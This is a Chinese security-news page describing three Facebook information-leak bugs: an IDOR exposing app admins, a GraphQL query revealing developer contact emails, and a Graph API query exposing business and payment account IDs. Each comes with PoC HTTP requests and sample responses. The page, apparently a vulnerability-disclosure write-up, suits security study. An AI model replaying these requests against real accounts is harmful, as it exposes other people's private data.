Facebook接口的三个信息泄漏:可获取任何Facebook应用程序的管理员帐户,开发人员联系邮箱和业务用户帐户ID。
摘要:Facebook接口的三个信息泄漏:可获取任何Facebook应用程序的管理员帐户,开发人员联系邮箱和业务用户帐户ID。
获取任何Facebook应用程序的管理员帐户
在Facebook BusinessManager平台中,可以通过界面获取其他企业的不同网页,应用程序和相关系统资产的管理员用户列表。
该漏洞的原因是此接口具有IDOR越权漏洞,该漏洞对其没有权限限制,这可能导致其获取任何Facebook业务应用程序的管理员帐户。
Facebook企业管理平台可以帮助公司,广告代理商或营销人员在统一界面下集中管理其Facebook主页,广告帐户和付款方式,从而避免了管理人员需要不断切换界面的尴尬境地。
PoC
请求:
POST /business/aymc_assets/admins/ HTTP/1.1
Host: business.facebook.com
asset_ids[0]=TARGET_APP_ID
business_id=ATTACKER_BUSINESS_ID
响应:
{"__ar": 1, "payload": {
"assetAdmins": {
"__imm": {
"method": "Map",
"value": [
["123456789",
{"name": "fname lname",
"id": "123456789",
"iconURI": "/images/assets_DO_NOT_HARDCODE/facebook_icons/badge-admin_outline_20_fds-black.png",
"isSelected": true,
"isSelectionDisabled": false,
"secondaryInfo": "FACEBOOK APP NAME"
}],
["123456789xxN",
{"name": "Admin N",
"id": "123456789xxN",
"iconURI": "/images/assets_DO_NOT_HARDCODE/facebook_icons/badge-admin_outline_20_fds-black.png",
"isSelected": true,
"isSelectionDisabled": false,
"secondaryInfo": "FACEBOOK APP NAME"
}]]}}}}
获取任何Facebook应用程序的联系电子邮件地址
在Facebook提供的开发人员应用程序管理界面中,尽管此页面中使用的Graph API接口是安全的,但开发人员联系电子邮件字段用于在开发人员或管理员之间进行通信,通常是私人信息。但是,在请求中更改为GraphQL方法调用后,我能够获得任何Facebook应用程序开发人员的联系电子邮件。
请求:
POST /graphqlHost: graph.facebook.comq=nodes(35xxxxx28){name,contact_email}
响应:
{ "35xxxxx28": { "name": "Facebook Application Name" "name": "contact@company.com" }}
获取Facebook企业用户帐户ID
该漏洞可以通过Facebook接口graph API中的应用程序节点类型获取与Facebook应用程序相关的企业帐户ID。 由于企业帐户ID是公开的,因此Facebook认为这不是隐私披露问题,但是后来发现可以请求获取另一个敏感用户字段“ payment_account_id”,该字段应属于用户隐私,Facebook最终接受了漏洞。
攻击者可以使用自己的帐户access_token获取其他业务用户的帐户ID:
GET /v3.1/{application-id}/?fields=id,name,business
Host: graph.facebook.com
GET /v3.1/{business-id}/?fields=primary_page,payment_account_id
Host: graph.facebook.com
相关热词搜索:Facebook信息泄漏 获取Facebook管理员帐户 获取邮箱 获取帐户ID 重庆网络安全
上一篇:跨站点Websocket Hijacking漏洞:劫持使用新应用程序的用户的Websocket连接,构造恶意Websocket信息,并劫持目标受害者的Facebook帐户。
下一篇:Google发布Chrome 80.0.3987.132更新,修复CVE-2020-6420等4个安全漏洞
人机验证(Captcha)绕过方法:使用Chrome开发者工具在目标网站登录页面上执行简单的元素编辑,以实现Captcha绕过
牛创网络: " 人机身份验证(Captcha)通常显示在网站的注册,登录名和密码重置页面上。 以下是目标网站在登录页面中排列的验证码机制。 从上图可以
2020-01-26 12:44:09 )9040( 亮了
自动发现IDOR(越权)漏洞的方法:使用BurpSuite中的Autozie和Autorepeater插件来检测和识别IDOR漏洞,而无需手动更改每个请求的参数
牛创网络: "自动发现IDOR(越权)漏洞的方法:使用BurpSuite中的Autozie和Autorepeater插件来检测和识别IDOR漏洞,而无需手动更改每个请求的参数
2020-01-30 14:04:47 )6318( 亮了
Grafana CVE-2020-13379漏洞分析:重定向和URL参数注入漏洞的综合利用可以在任何Grafana产品实例中实现未经授权的服务器端请求伪造攻击SSRF
牛创网络: "在Grafana产品实例中,综合利用重定向和URL参数注入漏洞可以实现未经授权的服务器端请求伪造攻击(SSRF)。该漏洞影响Grafana 3 0 1至7 0 1版本。
2020-08-12 14:26:44 )4361( 亮了
Nginx反向代理配置及反向代理泛目录,目录,全站方法
牛创网络: "使用nginx代理dan(sui)是http响应消息写入服务地址或Web绝对路径的情况。 写一个死的服务地址是很少见的,但它偶尔也会发生。 最棘手的是写入web绝对路径,特别是如果绝对路径没有公共前缀
2019-06-17 10:08:58 )3922( 亮了
fortify sca自定义代码安全扫描工具扫描规则(源代码编写、规则定义和扫描结果展示)
牛创网络: "一般安全问题(例如代码注入漏洞),当前fortify sca规则具有很多误报,可通过规则优化来减少误报。自带的扫描规则不能检测到这些问题。 需要自定义扫描规则,合规性角度展示安全风险。
2020-02-12 10:49:07 )3556( 亮了
整理几款2020年流行的漏洞扫描工具
牛创网络: "漏洞扫描器就是确保可以及时准确地检测信息平台基础架构的安全性,确保业务的平稳发展,业务的高效快速发展以及公司,企业和国家 地区的所有信息资产的维护安全。
2020-08-05 14:36:26 )2579( 亮了
微擎安装使用技巧-微擎安装的时候页面显示空白是怎么回事?
牛创网络: "我们在公众号开发中,有时候会用到微擎,那我们来看一下微擎安装的时候页面显示空白是怎么回事吧
2019-06-08 15:34:16 )2276( 亮了
渗透测试:利用前端断点拦截和JS脚本替换对前端加密数据的修改
牛创网络: " 本文介绍的两种方法,虽然断点调试比JS脚本代码替换更容易,但是JS脚本代码替换方法可以实现更强大的功能,测试人员可以根据实际需要选择适当的测试方法
2020-01-07 09:34:42 )2039( 亮了
从工业界到学界盘点SAS与R优缺点比较
牛创网络: "虽然它在业界仍然由SAS主导,但R在学术界广泛使用,因为它的免费开源属性允许用户编写和共享他们自己的应用程序 然而,由于缺乏SAS经验,许多获得数据分析学位的学生很难找到工作。
2019-07-13 22:25:29 )1859( 亮了
41款APP侵犯用户隐私权:QQ,小米,搜狐,新浪,人人均被通报
牛创网络: "随着互联网的不断发展,我们进入了一个时代,每个人都离不开手机。 但是,APP越来越侵犯了用户隐私权。12月19日,工业和信息化部发布了《关于侵犯用户权益的APP(第一批)》的通知。
2019-12-20 11:28:14 )1781( 亮了